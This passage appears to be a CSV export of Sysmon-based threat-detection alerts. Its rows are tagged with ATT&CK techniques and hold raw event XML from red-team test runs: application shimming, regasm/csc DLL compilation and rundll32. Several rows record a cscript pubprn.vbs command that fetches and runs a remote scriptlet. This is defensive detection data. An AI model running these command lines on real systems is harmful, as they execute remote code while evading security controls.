<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-664D-5D3F-0000-0010F1498C00</Data>
<Data Name=""ParentProcessId"">6836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c rundll32 AllTheThings.dll,EntryPoint</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028746.364512,2019-03-20T00:52:26.364512+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:52:26.364512Z"">
</TimeCreated>
<EventRecordID>1966444</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:52:26.194</Data>
<Data Name=""ProcessGuid"">365ABB72-568A-5C91-0000-0010D24B0800</Data>
<Data Name=""ProcessId"">4072</Data>
<Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
<Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Compatibility Database Installer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q -u &quot;C:\Windows\AppPatch\Test.SDB &quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
<Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
<Data Name=""ParentProcessId"">2704</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript running script,1564436085.660037,2019-07-30T01:34:45.660037+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:45.606737Z"">
</TimeCreated>
<EventRecordID>5006</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:45.524</Data>
<Data Name=""ProcessGuid"">747F3D96-6675-5D3F-0000-0010875C8F00</Data>
<Data Name=""ProcessId"">4036</Data>
<Data Name=""Image"">C:\Windows\System32\cscript.exe</Data>
<Data Name=""FileVersion"">5.812.10240.16384</Data>
<Data Name=""Description"">Microsoft ® Console Based Script Host</Data>
<Data Name=""Product"">Microsoft ® Windows Script Host</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6675-5D3F-0000-0010AA498F00</Data>
<Data Name=""ParentProcessId"">4184</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547556.069498,2019-07-19T18:45:56.069498+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;del T1121.dll&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:45:56.033241Z"">
</TimeCreated>
<EventRecordID>3615</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:45:56.002</Data>
<Data Name=""ProcessGuid"">747F3D96-D7A4-5D31-0000-0010C9C22900</Data>
<Data Name=""ProcessId"">6804</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;del T1121.dll&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547555.699293,2019-07-19T18:45:55.699293+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:45:55.681219Z"">
</TimeCreated>
<EventRecordID>3613</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:45:55.672</Data>
<Data Name=""ProcessGuid"">747F3D96-D7A3-5D31-0000-001081B22900</Data>
<Data Name=""ProcessId"">5800</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028745.943907,2019-03-20T00:52:25.943907+04:00,,Threat,High,"[T1138] Application Shimming - process: sdbinst.exe invoked on C:\Windows\AppPatch\Test.SDB by EXAMPLE\user01 (parent: Compatadmin.exe), please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:52:25.933892Z"">
</TimeCreated>
<EventRecordID>1966429</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:52:25.853</Data>
<Data Name=""ProcessGuid"">365ABB72-5689-5C91-0000-0010543F0800</Data>
<Data Name=""ProcessId"">3896</Data>
<Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
<Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Compatibility Database Installer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q &quot;C:\Windows\AppPatch\Test.SDB &quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
<Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
<Data Name=""ParentProcessId"">2704</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1563547555.621447,2019-07-19T18:45:55.621447+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs ) contains suspicious command ( \csc.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:45:55.105804Z"">
</TimeCreated>
<EventRecordID>3611</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:45:55.057</Data>
<Data Name=""ProcessGuid"">747F3D96-D7A3-5D31-0000-0010F2A42900</Data>
<Data Name=""ProcessId"">4784</Data>
<Data Name=""Image"">C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe</Data>
<Data Name=""FileVersion"">4.7.3190.0 built by: NET472REL1LAST_C</Data>
<Data Name=""Description"">Visual C# Command Line Compiler</Data>
<Data Name=""Product"">Microsoft® .NET Framework</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=ABAF24113034BBA4B4F4AC19D9097D36943D2E35,MD5=B87EE552626023951A7F03F2D31DA8A7,SHA256=D511363874B2A00D3DA5A20E6AE826334795A3A52AB5F8555C309D8068F5915B,IMPHASH=C4963CB3AF58DCFC863E42DD3B6FB80D</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D7A3-5D31-0000-0010A0A22900</Data>
<Data Name=""ParentProcessId"">6748</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1563547555.105804,2019-07-19T18:45:55.105804+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs&quot; ) contains suspicious command ( \csc.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:45:55.034352Z"">
</TimeCreated>
<EventRecordID>3610</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:45:55.023</Data>
<Data Name=""ProcessGuid"">747F3D96-D7A3-5D31-0000-0010A0A22900</Data>
<Data Name=""ProcessId"">6748</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547555.105804,2019-07-19T18:45:55.105804+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:45:55.034352Z"">
</TimeCreated>
<EventRecordID>3610</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:45:55.023</Data>
<Data Name=""ProcessGuid"">747F3D96-D7A3-5D31-0000-0010A0A22900</Data>
<Data Name=""ProcessId"">6748</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028585.172729,2019-03-20T00:49:45.172729+04:00,,Threat,High,"[T1138] Application Shimming - process: sdbinst.exe invoked with -u on C:\Windows\AppPatch\Test.SDB by EXAMPLE\user01 (parent: Compatadmin.exe), please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:49:45.162715Z"">
</TimeCreated>
<EventRecordID>1966423</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:49:45.052</Data>
<Data Name=""ProcessGuid"">365ABB72-55E9-5C91-0000-00102EEB0700</Data>
<Data Name=""ProcessId"">2104</Data>
<Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
<Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Compatibility Database Installer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q -u &quot;C:\Windows\AppPatch\Test.SDB &quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
<Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
<Data Name=""ParentProcessId"">2704</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547519.48325,2019-07-19T18:45:19.483250+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:45:06.267992Z"">
</TimeCreated>
<EventRecordID>3606</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:45:06.251</Data>
<Data Name=""ProcessGuid"">747F3D96-D772-5D31-0000-00107CF02800</Data>
<Data Name=""ProcessId"">324</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
